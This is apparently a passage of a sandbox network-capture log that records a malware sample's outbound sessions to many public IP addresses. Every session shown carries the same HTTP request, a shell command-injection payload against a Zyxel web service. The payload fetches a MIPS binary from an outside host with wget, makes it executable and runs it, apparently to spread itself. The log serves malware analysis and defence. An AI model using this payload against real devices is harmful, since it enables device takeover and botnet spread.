                                                Jan 29, 2024 07:07:35.049777985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1080192.168.2.235765082.194.95.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049815893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1081192.168.2.2348438172.218.38.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049848080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1082192.168.2.235135644.119.118.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049870968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1083192.168.2.2353782125.136.115.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049932003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1084192.168.2.2358896140.127.83.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049962044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1085192.168.2.233329444.169.245.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050019026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1086192.168.2.235522041.234.56.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050065041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1087192.168.2.2354344113.243.189.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050080061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1088192.168.2.233348699.130.17.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050107956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1089192.168.2.2341964149.31.107.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050148964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1090192.168.2.236046436.207.255.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050188065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1091192.168.2.2347816212.105.95.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050209045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1092192.168.2.2356874220.147.244.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050260067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1093192.168.2.2347442146.82.255.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050307989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1094192.168.2.235516067.228.65.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050348043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1095192.168.2.2338806113.164.189.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050363064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1096192.168.2.236039661.132.78.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050400972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1097192.168.2.2355906179.191.44.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050451040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1098192.168.2.236076070.175.140.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050507069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1099192.168.2.234873627.55.48.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050515890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1100192.168.2.2344486133.13.224.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050559998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1101192.168.2.2346654220.155.158.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050596952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1102192.168.2.234649252.40.192.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050649881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1103192.168.2.2349790156.62.86.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050678015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1104192.168.2.234822692.100.254.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050698996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1105192.168.2.233956040.58.131.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050739050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1106192.168.2.234088068.24.188.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050791979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1107192.168.2.2340696212.154.105.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050820112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1108192.168.2.2338298168.170.242.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050859928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1109192.168.2.2351344160.210.16.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050899982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1110192.168.2.234308427.81.221.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050936937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1111192.168.2.2357276210.72.26.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.050980091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1112192.168.2.2344756191.53.2.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051012039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1113192.168.2.2345894151.106.127.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051039934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1114192.168.2.234799677.9.222.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051091909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1115192.168.2.233598880.132.153.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051136971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1116192.168.2.2356788157.33.8.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051188946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1117192.168.2.2356130174.95.229.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051219940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1118192.168.2.233556494.136.215.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051249981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1119192.168.2.234218848.135.245.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051285028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1120192.168.2.2334002175.95.184.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051311016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1121192.168.2.2360840141.150.2.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051345110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1122192.168.2.235070271.94.147.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051389933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1123192.168.2.2346196178.23.125.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051431894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1124192.168.2.234514296.220.68.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051460028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1125192.168.2.2342540121.3.73.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051508904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1126192.168.2.2351162196.183.202.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051533937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1127192.168.2.2341092164.210.69.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051547050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1128192.168.2.234508480.222.132.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051606894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1129192.168.2.2337330195.163.241.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051668882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1130192.168.2.2340580112.35.47.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051717997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1131192.168.2.233909289.187.144.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051747084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1132192.168.2.234393269.248.228.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051773071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1133192.168.2.2349316132.254.232.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051815987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1134192.168.2.234226893.82.155.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051887035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1135192.168.2.2349958189.123.94.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051913023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1136192.168.2.233590676.183.14.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051934958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1137192.168.2.2360830122.134.237.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.051980019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1138192.168.2.234912625.65.188.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052011013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1139192.168.2.2354638190.198.4.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052021027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1140192.168.2.2345326136.96.89.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052068949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1141192.168.2.233893258.109.28.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052098989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1142192.168.2.2350676217.248.109.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052128077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1143192.168.2.2349448169.53.191.117443
                                                TimestampBytes transferredDirectionData
